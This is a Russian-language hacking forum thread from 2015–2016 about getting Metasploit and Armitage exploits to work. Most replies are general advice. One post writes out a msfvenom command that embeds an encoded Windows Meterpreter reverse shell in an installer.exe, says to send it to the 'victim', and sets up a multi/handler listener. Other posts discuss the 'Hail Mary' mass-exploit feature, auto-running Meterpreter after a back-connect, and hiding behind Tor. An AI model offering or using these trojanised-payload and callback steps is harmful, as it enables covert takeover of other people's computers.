Просмотр полной версии : вопрос по metasploit
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
BabaDook
15.05.2015, 21:08
↑ (https://antichat.live/posts/3847764/)
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
так бак трак или kali. Плюнь в лицо кто тебе сказал что бесплатная версия не работает. Думаю тут мало у кого есть 5000 на покупку его. метасплоит это лишь удобный запуск эксплоита.
ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )
но вот стал перед делемой штормить ли дальше метасплоит или делать ручками
мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((
вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
↑ (https://antichat.live/posts/3847773/)
ну типа все пашет, но заюзать дырку не дает, может канешно и дырка на цевой машине запатчена, открытый порт это же еще не дырка )
но вот стал перед делемой штормить ли дальше метасплоит или делать ручками
мучаю также армитаж, вроде он все находит, говорит дыры есть и не одна но ни один эксплоит не срабатывает ((
вот и хотелось бы услышать что ктото реально заюзал из этих сборок чтото и что все пашет
Все отлично работает на бесплатнной версии.
Надо просто прямые руки
Можешь на первое время (да и в целом) облегчить себе задачу - накатить GUI к Metasploit Framework+Nmap - Armitage.
Тогда весь процесс можно свести к следующему алгоритму:
0. Hosts -> Add hosts.
1. Scan.
2. Attacks -> Find Attacks.
3. Attacks ->Hail Mary
.SpoilerTarget" type="button">Spoiler
Если речь идет о обговоренном заранее пентесте, иначе использование этого модуля приведет к запуску всех подходящих эксплойтах из шага "2", что не очень хорошо в плане анонимности.
4. Смотрим результат.
Могу выложить с картиночками из личной практики. В принципе для того, чтобы потестить на устойчивость к паблику - этого хватит.
Так же здесь можно проверить на наличие всяких дефолтных учеток
.SpoilerTarget" type="button">Spoiler
а-ля lbacsys/lbacsys в Oracle Database.
Но это все ближе непосредственно к сетевым сервисам. Если тебя интересует web - то есть много других инструментов.
soul reaver
26.05.2015, 09:33
↑ (https://antichat.live/posts/3847764/)
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Дело действительно заключается в ровности рук, gosmir верное дело подсказал юзай Armitage он сильно упрощает и без того не сложный процесс.
З.Ы. Сам юзал его по началу когда столкнулся с подобной проблемой.
chatanti
09.06.2015, 21:41
Господа, дабы не плодить тем, не подскажете по метерпретеру? Как-то мимо меня это прошло..
Есть ли возможность настройки/написания скрипта, который бы выполнялся для метепретера автоматически после бэкконекта? Предположим, я хочу запустить powershell скрипт с помощью команды shell. Или
вывести в консоль(в БД) инфу о системе(sysinfo)? А потом, допустим, создать директорию(mkdir) и перезагрузится? Т.е. хотелось бы оперировать именно командами метерпретерами с небольшой своей логикой. И все это автоматически.. Заранее спасибо.
ПС могу рассказать как юзать метерпретер через тор.
Shadow Stream
23.11.2016, 00:39
↑ (https://antichat.live/posts/3847764/)
недавно для себя открыл эту платформу, чето пробую тестировать у себя на виртуалках но ниче не выходит, услышал со стороны такое мнение что метасплоит не работает на бесплатной основе (юзаю настроеный в backtrack, kali), тоисть дырки видны експлоиты также но сделать оно ниче не дает
вот отсюда вопрос знающих лючей насколько эта информация дествительна ? проблема в кривых руках или оно дествительно бесплатно работать не будет и лучше в ручнуюу искать эксплоит и пробовать заюзать без платформы метасплоит ?
Перед тем как начать работу в Metasploit :
- надо разобраться в exploit ;
- проверить LHOST (прописать ifconfig );
- LPORT 8080 (443, 6666) порт очень важен ;
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe
отправить файл на VICTIM OS (жертва)
msfconsole
use exploit/multi/handler
set Payload windows/meteroreter/reverse_tcp
set LHOST xxx.xxx.x.x
set LPORT 8080
exploit
Vjubkmobr
01.12.2016, 16:41
Один и очень важный аспект это белый ip + tor, в локалке можно и так плющить)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot